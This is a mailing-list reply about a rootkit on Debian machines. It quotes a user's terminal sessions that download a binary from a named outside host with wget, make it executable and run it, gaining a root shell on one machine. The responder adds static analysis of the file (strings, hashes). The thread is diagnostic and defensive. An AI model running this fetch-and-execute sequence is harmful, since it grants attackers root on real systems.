On Sun, 4 Oct 2009 10:15:35 -0400 Thomas Krichel <[email protected]> wrote:
> I am running debian testing, 2.6.30 kernel. > > I have a rootkit installed on a bunch of machines that rkhunter > does not find. This appears after infection with SHV4 / SHV5, > which rkhunter found. > > Here it works to allow a non-root user to become root > > kric...@fricka:~$ mkdir a > kric...@fricka:~$ cd a > kric...@fricka:~/a$ ls -l > total 0 > kric...@fricka:~/a$ wget webmail.facill.com.br/a > --2009-10-04 07:47:42-- http://webmail.facill.com.br/a > Resolving webmail.facill.com.br... 201.65.241.194 > Connecting to webmail.facill.com.br|201.65.241.194|:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 6886 (6.7K) [text/plain] > Saving to: `a' > > 100%[======================================>] 6,886 6.88K/s > in 1.0s > > 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886] > > kric...@fricka:~/a$ chmod 777 a > kric...@fricka:~/a$ ./a > r...@fricka:~/a# > > Here is a situation where it does not work > > kric...@chichek:~$ mkdir a > kric...@chichek:~$ cd a > kric...@chichek:~/a$ wget webmail.facill.com.br/a > --2009-10-04 07:31:15-- http://webmail.facill.com.br/a > Resolving webmail.facill.com.br... 201.65.241.194 > Connecting to webmail.facill.com.br|201.65.241.194|:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 6886 (6.7K) [text/plain] > Saving to: `a' > > 100%[======================================>] 6,886 37.8K/s > in 0.2s > > 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886] > > kric...@chichek:~/a$ chmod 777 a > kric...@chichek:~/a$ ./a > mmap: Permission denied > > > Does anybody here know how to delete this kit? > > > Cheers, > > Thomas Krichel http://openlib.org/home/krichel > RePEc:per:1965-06-05:thomas_krichel > skype: thomaskrichel This file should at least be deleted from the host. fg...@foo:~$ file a a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped fg...@foo:~$ strings a /lib/ld-linux.so.2 __gmon_start__ libc.so.6 _IO_stdin_used socket exit execl ftruncate perror sendfile unlink mkstemp mmap getpagesize getgid getuid __libc_start_main GLIBC_2.1 GLIBC_2.0 PTRh ([^_] [^_] mmap socket mkstemp unlink ftruncate /bin/sh /tmp/tmp.XXXXXX fg...@foo:~$ md5sum a b950af01be61a8cbf5d479430738bd18 a fg...@foo:~$ sha1sum a 639536caea56554406106ad8679115971485f3a2 a -- To UNSUBSCRIBE, email to [email protected] with a subject of "unsubscribe". Trouble? Contact [email protected]
